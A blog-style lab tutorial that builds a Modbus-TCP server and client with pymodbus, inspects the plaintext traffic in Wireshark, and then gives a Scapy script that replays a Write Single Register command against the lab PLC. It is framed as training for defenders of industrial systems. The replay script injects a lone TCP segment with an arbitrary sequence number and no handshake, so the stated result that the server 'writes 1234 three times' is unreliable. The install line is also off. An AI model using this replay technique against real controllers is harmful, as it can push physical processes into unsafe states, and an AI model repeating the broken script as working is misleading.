TL;DR  In this post we build a Modbus‑TCP lab with Python (pymodbus), watch the plaintext protocol in Wireshark, then craft a replay attack with Scapy.


1  Why Modbus Still Matters and Why It’s Risky  

Modbus dates back to 1979 and is still everywhere in industrial automation. Because it was designed for isolated serial links, Modbus‑TCP has:

  • No encryption — anyone can read every byte.
  • No authentication — anyone can send commands.
  • No freshness / sequence checks — making replay trivial.

That combination is a gift for red‑teamers and a nightmare for plant operators.


2  Lab Topology  

┌─────────────┐        TCP/5020         ┌──────────────┐
│  Client      │  <──►  NORMAL  ◄──►   │   Server      │
│ (SCADA HMI) │                         │ (Sensor PLC) │
└─────────────┘                         └──────────────┘
          ▲                                   ▲
          │  (replay)                         │
          └──  Attacker (Scapy) ──────────────┘
  • Port 5020 in our lab
  • We simulate the PLC server and HMI client with pymodbus.
  • The attacker re‑injects captured packets via Scapy.

3  Prerequisites  

python -m pip install pymodbus==3.5.4 scapy wireshark  # versions can vary
  • Linux or WSL is easiest.
  • If you want real isolation, spin up two VMs; otherwise loopback works.

4  Step‑by‑Step — Normal Modbus Traffic  

4.1  Modbus Server (sensor/PLC)

# modbus_server.py
import asyncio
import logging

from pymodbus.datastore import (
    ModbusSequentialDataBlock,
    ModbusServerContext,
    ModbusSlaveContext,
)
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.server import StartAsyncTcpServer

logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.INFO)

async def run_server():
    """Run Modbus TCP server."""
    log.info("Initializing Modbus data store")
    store = ModbusSlaveContext(
        hr=ModbusSequentialDataBlock(0, [17] * 100), # Holding registers (address 0-99)
        di=ModbusSequentialDataBlock(0, [15] * 100), # Discrete inputs (address 0-99)
        co=ModbusSequentialDataBlock(0, [True] * 100), # Coils (address 0-99)
        ir=ModbusSequentialDataBlock(0, [20] * 100)  # Input registers (address 0-99)
    )
    context = ModbusServerContext(slaves=store, single=True)

    identity = ModbusDeviceIdentification(
        info_name={
            "VendorName": "Pymodbus",
            "ProductCode": "PM",
            "VendorUrl": "https://github.com/pymodbus-dev/pymodbus/",
            "ProductName": "Pymodbus Server",
            "ModelName": "Pymodbus Server",
            "MajorMinorRevision": "3.9.2",
        }
    )

    # Use a non-privileged port like 5020 (standard Modbus TCP is 502)
    address = ("0.0.0.0", 5020)
    log.info(f"Starting Modbus TCP server on {address[0]}:{address[1]}")
    server = await StartAsyncTcpServer(
        context=context, 
        identity=identity,  
        address=address,  
    )
    log.info("Server started. Use Ctrl+C to stop.")
    await asyncio.Future()

if __name__ == "__main__":
    try:
        asyncio.run(run_server())
    except KeyboardInterrupt:
        log.info("Server stopped by user.")

4.2  Modbus Client (HMI / SCADA poller)

# modbus_client.py
import asyncio
import logging

from pymodbus.client import AsyncModbusTcpClient

logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.INFO)

SERVER_IP = "127.0.0.1" # Connect to localhost
SERVER_PORT = 5020

async def run_client():
    client = AsyncModbusTcpClient(SERVER_IP, port=SERVER_PORT)

    log.info(f"Connecting to Modbus server at {SERVER_IP}:{SERVER_PORT}")
    await client.connect()

    if not client.connected:
        log.error("Failed to connect to the Modbus server.")
        return

    log.info("Successfully connected to the server.")

    try:
        # 1. Read Holding Registers (address 0, count 5)
        log.info("Attempting to read holding registers...")
        rr = await client.read_holding_registers(address=0, count=5)
        if rr.isError():
            log.error(f"Modbus Error reading holding registers: {rr}")
        else:
            log.info(f"Read Holding Registers (0-4): {rr.registers}")

        await asyncio.sleep(1)

        # 2. Write Single Coil (address 10, value True)
        log.info("Attempting to write single coil...")
        rq = await client.write_coil(address=10, value=True)
        if rq.isError():
            log.error(f"Modbus Error writing coil: {rq}")
        else:
            log.info(f"Wrote Coil 10: True")

        await asyncio.sleep(1)

        # 3. Read Coils (address 10, count 1)
        log.info("Attempting to read coils...")
        rr_coils = await client.read_coils(address=10, count=1)
        if rr_coils.isError():
            log.error(f"Modbus Error reading coils: {rr_coils}")
        else:
            log.info(f"Read Coil 10: {rr_coils.bits[0]}")

        await asyncio.sleep(1)

        # 4. Write Single Register (address 20, value 1234)
        log.info("Attempting to write single register...")
        rq_reg = await client.write_register(address=20, value=1234)
        if rq_reg.isError():
            log.error(f"Modbus Error writing register: {rq_reg}")
        else:
            log.info(f"Wrote Holding Register 20: 1234")

        await asyncio.sleep(1)

        # 5. Read Input Registers (address 5, count 3)
        log.info("Attempting to read input registers...")
        rr_ir = await client.read_input_registers(address=5, count=3)
        if rr_ir.isError():
            log.error(f"Modbus Error reading input registers: {rr_ir}")
        else:
            log.info(f"Read Input Registers (5-7): {rr_ir.registers}")

    except Exception as e:
        log.error(f"An error occurred during Modbus operations: {e}")
    finally:
        log.info("Closing connection.")
        client.close()

if __name__ == "__main__":
    asyncio.run(run_client())

Run server then client in two terminals. You should see logs confirming write & read.


5  Capturing Traffic in Wireshark  

  1. Start capture on the interface (lo if local).
  2. Decode Modbus on port 5020Edit ▸ Preferences ▸ Protocols ▸ Modbus/TCP ▸ Ports = 5020.
  3. Use display filter:
modbus.func_code == 3 || modbus.func_code == 6
  1. Observe:

    • FC:6 request & response (write 1234)
    • FC:3 request & response (read back)

Normal Modbus write/read


6  Replay Attack Theory

“The Man‑in‑the‑Middle attacker will store the Modbus messages and will send these messages to target nodes—HMI or PLC—after some intentional delay. Because a Modbus frame contains no timestamp field, the PLC or HMI cannot know if a response belongs to a recent request or an old one. The frame may carry stale field‑parameter values, but the HMI will nonetheless display them, and the PLC will act on them, potentially driving actuators into unsafe states.” — adapted from [2]

Because Modbus has no freshness or auth, any attacker who records a valid packet can resend it later:

  1. Sniff traffic, capture a Write Single Register command.
  2. Craft an identical packet.
  3. Replay it — PLC accepts without question.

Impact ranges from changing process variables to shutting down actuators.


7  Executing the Replay with Scapy  

7.1  Crafting Packet Fields

We captured a real Write Single Register frame and noted:

  • Transaction ID 0x0004
  • Function Code 0x06
  • Address 0x0014 (20)
  • Data 0x04D2 (1234)

7.2  Replay Script

# replay_modbus.py
from scapy.all import *
import time
# Write value 1234 to address 20
modbus_payload = (
    b'\x00\x04'       # Transaction ID: 4
    b'\x00\x00'       # Protocol ID: 0
    b'\x00\x06'       # Length
    b'\x01'           # Unit ID
    b'\x06'           # Function Code 6: Write Single Register
    b'\x00\x14'       # Register address: 20
    b'\x04\xd2'       # Value: 1234 (0x04D2)
)

ip = IP(dst="127.0.0.1")  # Your Modbus server IP
tcp = TCP(dport=5020, sport=RandShort(), flags="PA", seq=1000)
packet = ip / tcp / Raw(load=modbus_payload)
for i in range(3):
    send(packet)
    print(f"[+] Replayed Write Register Attack #{i+1}")
    time.sleep(1)

Run it while Wireshark is capturing.

Normal Modbus write/read

The server again writes 1234 three times.


8  Conclusion  

This lab shows how easy it is to intercept and replay Modbus commands. Until ICS systems migrate to secure protocols or add compensating controls, they remain exposed to trivial tampering. Build labs like this to train defenders, and justify security budget!


9  Resources

  1. Modbus Application Protocol Specification v1.1b3 – Official spec (Modbus Org) - TCP/IP https://modbus.org/docs/Modbus_Messaging_Implementation_Guide_V1_0b.pdf

  2. Detection and Blocking of Replay, False Command, and False Access Injection Commands in SCADA Systems with Modbus Protocol https://onlinelibrary.wiley.com/doi/10.1155/2021/8887666